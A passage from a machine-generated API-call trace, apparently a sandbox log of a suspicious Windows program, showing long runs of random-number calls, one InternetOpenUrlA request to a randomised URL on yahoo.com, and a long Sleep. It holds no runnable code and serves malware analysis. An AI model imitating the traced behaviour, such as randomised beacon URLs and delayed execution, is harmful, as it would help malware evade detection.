pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0261.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028e8, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a028e8) returned 0x0 [0261.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.139] GetProcessHeap () returned 0x440000 [0261.139] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0261.139] lstrcpyA (in: lpString1=0x472f30, lpString2="_û¸}s://www.yahoo.com" | out: lpString1="_û¸}s://www.yahoo.com") returned="_û¸}s://www.yahoo.com" [0261.139] lstrcatA (in: lpString1="_û¸}s://www.yahoo.com", lpString2="/sqRr8a563giU51CfvsmslpJsEvbZeuxnwho3dbovbmoutqc/1chufj77frez2b88z9hsKt2fkzJ2vK9ve8ha9c47uhjn/h1XwL0wzvjmkGwkm6aylbtbw/rw4fhlrmh9kkgYp4n0vquafnrtqj5q4j/so34XOsZqllv3v3D1kxR7up6S/" | out: lpString1="_û¸}s://www.yahoo.com/sqRr8a563giU51CfvsmslpJsEvbZeuxnwho3dbovbmoutqc/1chufj77frez2b88z9hsKt2fkzJ2vK9ve8ha9c47uhjn/h1XwL0wzvjmkGwkm6aylbtbw/rw4fhlrmh9kkgYp4n0vquafnrtqj5q4j/so34XOsZqllv3v3D1kxR7up6S/") returned="_û¸}s://www.yahoo.com/sqRr8a563giU51CfvsmslpJsEvbZeuxnwho3dbovbmoutqc/1chufj77frez2b88z9hsKt2fkzJ2vK9ve8ha9c47uhjn/h1XwL0wzvjmkGwkm6aylbtbw/rw4fhlrmh9kkgYp4n0vquafnrtqj5q4j/so34XOsZqllv3v3D1kxR7up6S/" [0261.139] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0261.139] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="_û¸}s://www.yahoo.com/sqRr8a563giU51CfvsmslpJsEvbZeuxnwho3dbovbmoutqc/1chufj77frez2b88z9hsKt2fkzJ2vK9ve8ha9c47uhjn/h1XwL0wzvjmkGwkm6aylbtbw/rw4fhlrmh9kkgYp4n0vquafnrtqj5q4j/so34XOsZqllv3v3D1kxR7up6S/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0261.139] GetProcessHeap () returned 0x440000 [0261.139] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0261.140] GetProcessHeap () returned 0x440000 [0261.140] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02850 | out: hHeap=0x440000) returned 1 [0261.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0261.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0261.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0261.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0261.141] Sleep (dwMilliseconds=0x1bd04) [0261.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0261.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.263] GetProcessHeap () returned 0x440000 [0261.263] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16940 [0261.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16941, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a16941) returned 0x0 [0261.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0261.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16958, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a16958) returned 0x0 [0261.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0261.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0261.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0261.407] BCryptGenRandom (in: hAlgorithm=0x0, 